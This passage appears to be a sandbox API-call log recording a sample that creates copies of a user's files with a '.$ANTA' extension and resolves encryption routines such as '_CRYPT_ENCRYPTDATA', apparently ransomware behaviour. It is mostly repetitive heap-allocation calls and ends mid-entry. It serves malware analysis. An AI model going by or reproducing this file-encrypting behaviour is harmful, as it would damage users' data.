| out: hHeap=0x1780000) returned 1 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0118.041] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\" (normalized: "c:\\users\\fd1hvy\\music\\tg2o")) returned 0x10 [0118.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0118.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0118.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0118.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0118.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.042] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\lj_rjdqgish84bcgxk.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0118.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0118.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0118.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0118.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0118.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0118.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0118.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0118.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e03020 [0118.046] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0118.046] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0xb9fc, lpOverlapped=0x0) returned 1 [0118.048] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0118.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb9fc) returned 0x4516010 [0118.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e03020 | out: hHeap=0x1780000) returned 1 [0118.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0118.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0118.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0118.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb9fc) returned 0x4521a18 [0118.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0118.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.051] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb9fc) returned 0x4516010 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.052] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0118.052] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0118.052] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0118.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0118.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb9fc) returned 0x4516010 [0118.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb9fc) returned 0x452d420 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0118.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0118.054] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0118.054] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.055] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0118.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.055] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.056] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0118.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0118.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.057] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.057] RtlAllocateHeap 